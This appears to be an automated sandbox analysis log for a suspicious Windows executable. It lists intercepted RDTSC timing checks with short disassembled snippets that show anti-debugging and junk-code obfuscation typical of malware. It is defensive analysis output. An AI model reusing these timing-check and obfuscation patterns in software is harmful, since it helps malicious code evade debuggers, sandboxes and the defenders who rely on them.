Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAB46 second address: 2AAB4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAB4C second address: 2AAB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F0549119936h 0x0000000d jns 00007F0549119936h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AAF69 second address: 2AAF8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05491602E6h 0x00000008 jbe 00007F05491602D6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB224 second address: 2AB229 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB229 second address: 2AB243 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F05491602D6h 0x00000009 jg 00007F05491602D6h 0x0000000f jne 00007F05491602D6h 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB243 second address: 2AB27D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F054911993Bh 0x00000012 pushad 0x00000013 jmp 00007F0549119947h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB27D second address: 2AB282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB282 second address: 2AB28A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB3F3 second address: 2AB3F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB3F7 second address: 2AB415 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F054911993Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F0549119936h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB415 second address: 2AB422 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB422 second address: 2AB428 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB55B second address: 2AB55F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB55F second address: 2AB588 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jc 00007F0549119936h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007F0549119936h 0x00000013 jmp 00007F0549119944h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2AB588 second address: 2AB5A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push esi 0x00000007 jmp 00007F05491602E0h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234DDA second address: 234DEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007F054911993Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234DEF second address: 234E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05491602E9h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234E10 second address: 234E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 234E17 second address: 234E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F05491602D6h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3713 second address: 2B3717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3853 second address: 2B3857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3857 second address: 2B3878 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0549119936h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c jns 00007F0549119938h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F054911993Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3878 second address: 2B387C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B387C second address: 2B3890 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F0549119936h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F054911993Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3D67 second address: 2B3D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F05491602DBh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B3466 second address: 2B346F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2B346F second address: 2B3473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BCC6A second address: 2BCC85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119947h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BB6E0 second address: 2BB6E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BB6E6 second address: 2BB6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBB89 second address: 2BBBA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F05491602DEh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBBA0 second address: 2BBBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBBA4 second address: 2BBBC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F05491602E4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBFAF second address: 2BBFBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F0549119936h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BBFBB second address: 2BBFC1 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2BB40F second address: 2BB42F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0549119947h 0x00000009 popad 0x0000000a push edi 0x0000000b pushad 0x0000000c popad 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C1495 second address: 2C14A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jc 00007F05491602D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14A4 second address: 2C14B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0549119936h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14B0 second address: 2C14C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DAh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14C2 second address: 2C14C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C14C6 second address: 2C14CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27AFD3 second address: 27AFDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27AFDC second address: 27AFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B3D2 second address: 27B3DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0549119936h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B3DC second address: 27B3FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007F05491602D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B4AA second address: 27B4AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B4AF second address: 27B539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 751990B3h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F05491602D8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Dh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a mov dl, AAh 0x0000002c call 00007F05491602D9h 0x00000031 jmp 00007F05491602DAh 0x00000036 push eax 0x00000037 jg 00007F05491602E0h 0x0000003d mov eax, dword ptr [esp+04h] 0x00000041 jmp 00007F05491602DEh 0x00000046 mov eax, dword ptr [eax] 0x00000048 pushad 0x00000049 push eax 0x0000004a push edx 0x0000004b jnp 00007F05491602D6h 0x00000051 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27B91D second address: 27B924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BDD4 second address: 27BDE6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F05491602D6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BF14 second address: 27BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edi 0x00000008 jnl 00007F0549119938h 0x0000000e pop edi 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007F054911993Bh 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f js 00007F0549119936h 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BF42 second address: 27BF5C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jne 00007F05491602D6h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 je 00007F05491602D8h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0765 second address: 2C0788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F054911993Bh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0549119941h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0788 second address: 2C078D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0A62 second address: 2C0A8A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F0549119936h 0x0000000d jmp 00007F054911993Fh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 js 00007F0549119936h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0E7E second address: 2C0E82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0E82 second address: 2C0E96 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0549119936h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F0549119936h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0E96 second address: 2C0E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C0FE7 second address: 2C1003 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0549119946h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C1003 second address: 2C1046 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F05491602D8h 0x00000008 jmp 00007F05491602DDh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jns 00007F05491602D6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007F05491602E7h 0x00000022 pop eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push ecx 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C4DC2 second address: 2C4DC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C4944 second address: 2C495E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F05491602DDh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2C495E second address: 2C4962 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC33B second address: 2CC33F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC33F second address: 2CC34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC34B second address: 2CC34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BAA2 second address: 27BAA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BAA8 second address: 27BAFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 nop 0x00000007 sub ecx, dword ptr [ebp+122D2913h] 0x0000000d mov ebx, dword ptr [ebp+12486BD8h] 0x00000013 push 00000000h 0x00000015 push edi 0x00000016 call 00007F05491602D8h 0x0000001b pop edi 0x0000001c mov dword ptr [esp+04h], edi 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edi 0x00000029 push edi 0x0000002a ret 0x0000002b pop edi 0x0000002c ret 0x0000002d clc 0x0000002e add eax, ebx 0x00000030 mov edi, dword ptr [ebp+122D3873h] 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a jmp 00007F05491602E3h 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BAFD second address: 27BB02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BB02 second address: 27BB07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 27BB07 second address: 27BB62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F0549119938h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 cld 0x00000027 push 00000004h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007F0549119938h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000015h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 mov dword ptr [ebp+122D2C54h], edx 0x00000049 push eax 0x0000004a push edi 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CC65B second address: 2CC67B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05491602DAh 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop esi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jbe 00007F0549160301h 0x00000018 jbe 00007F05491602E2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD156 second address: 2CD15A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD15A second address: 2CD18B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05491602DAh 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F05491602E9h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD18B second address: 2CD1A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F054911993Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CD1A0 second address: 2CD1A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2CFC6F second address: 2CFC79 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0549119936h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2D41B7 second address: 2D41D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2D4636 second address: 2D463C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD69A second address: 2DD6B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E4h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD846 second address: 2DD84C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD84C second address: 2DD85B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD85B second address: 2DD85F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD978 second address: 2DD97E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DD97E second address: 2DD988 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0549119936h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDC14 second address: 2DDC2D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F05491602D6h 0x00000008 jmp 00007F05491602DFh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDC2D second address: 2DDC4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F0549119936h 0x00000009 jmp 00007F054911993Dh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0gnHF2twcT.exe RDTSC instruction interceptor: First address: 2DDC4A second address: 2DDC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05491602E5h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
